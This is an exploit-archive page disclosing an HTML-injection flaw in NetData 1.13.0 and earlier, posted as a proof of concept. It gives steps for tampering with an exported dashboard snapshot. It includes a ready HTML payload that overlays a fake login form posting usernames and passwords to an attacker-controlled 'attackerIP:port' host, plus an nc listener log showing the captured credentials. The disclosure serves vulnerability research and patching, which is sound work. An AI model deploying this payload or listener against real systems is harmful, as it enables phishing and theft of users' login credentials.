what you don't know can hurt you

NetData 1.13.0 HTML Injection

NetData 1.13.0 HTML Injection
Posted Mar 15, 2019
Authored by Marcelo Vazquez

NetData versions 1.13.0 and below suffer from an html injection vulnerability.

tags | exploit
MD5 | f29c3ddc1f8748e3056e7ae71f90e31c

NetData 1.13.0 HTML Injection

Change Mirror Download
# ************************************************************************
# * Author: Marcelo VA!zquez (aka s4vitar) *
# * NetData v1.13.0 HTML Injection Vulnerability *
# ************************************************************************

# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
# Date: 2019-03-14
# Exploit Author: Marcelo VA!zquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://my-netdata.io/
# Software Link: https://docs.netdata.cloud/packaging/installer/
# Version: <= NetData v1.13.0
# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k

NetData is prone to multiple HTML-injection vulnerabilities.

Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

NetData 1.13.0 is vulnerable; other versions may also be affected.

Proof of Concept:
=====================

1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:

<div style='position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;'>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name='login' action='http://attackerIP:port/'><table><tr><td>Username:</td><td><input type='text' name='username'/></td></tr><tr><td>Password:</td><td><input type='text' name='password'/></td></tr><tr><td colspan=2 align=center><input type='submit' value='Login'/></td></tr></table></form></div>

In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.

3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

4. Once imported, the victim will see a login form that asks for their credentials.

5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:

root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    14 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close